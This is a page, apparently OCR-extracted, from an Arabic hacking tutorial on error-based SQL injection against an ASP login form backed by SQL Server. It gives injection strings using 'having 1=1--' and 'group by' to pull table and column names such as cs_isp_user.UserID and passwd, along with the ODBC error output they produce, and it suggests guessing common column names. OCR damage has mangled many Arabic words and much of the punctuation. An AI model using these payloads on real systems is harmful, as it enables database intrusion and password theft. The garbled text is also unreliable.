Page 235 - بسم الله الرحمن الرحيم
P. 235
وكذلك كلمة المرور ) في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن --ستهملها لنها تصأتصي بعد اسم
المستخد.م في أمر الـ SQL
تصوجهد طريقه مريحه جهدا ومضمونه بحيث أنك لن تصحتاج لتخمين أحد أسماء العمده
وهي أستخدا.م having clause
بالطريقه التاليه
أسم مستخد.م 'having 1=1--
حيث سنحصل على رسالة ختطأ كالتاليه
'Microsoft OLE DB Provider for ODBC Drivers error '80040e14
]Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp, line 33/
وبها أسم الجدول وأيضا أسم أول عمود
بعدها لنستطيع الحصول على اسماء بقية العمده
سنستخد.م group by
بالشكل التالي
'group by cs_isp_user.UserID--
بعدها سنحصل على عمود أسمه passwd
فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي
'group by cs_isp_user.UserID,cs_isp_user.passwd--
ونكرر زيادة أسم كل جهدول مع العمود إلى أن نحصل على صفحة تصخبرنا بأن أسم المستخد.م ختاطئ !
نحتاج الن أن نقو.م بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدول
نقو.م بإدختال التالي :
أسم مستخد.م --(blah' group by (username :
فنحصل على الخطأ التالي :
اقتباس:
Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
]Microsoft][ODBC SQL Server Driver][SQL Server]Invalid
.'column name 'username
arabic/Scripts/ar_csd_reply.asp, line 33/
وهو ما يفيد بأنه ل يوجهد عمود في هذا الجدول له السم username
نقو.م بتجربه السماء الشائعه مثل password ,username,id,userid,email
first_name,
عند تصجربتنا لـ useridفأننا نحصل على ختطأ أختر وهو ما نبحث عنه
اقتباس:
235
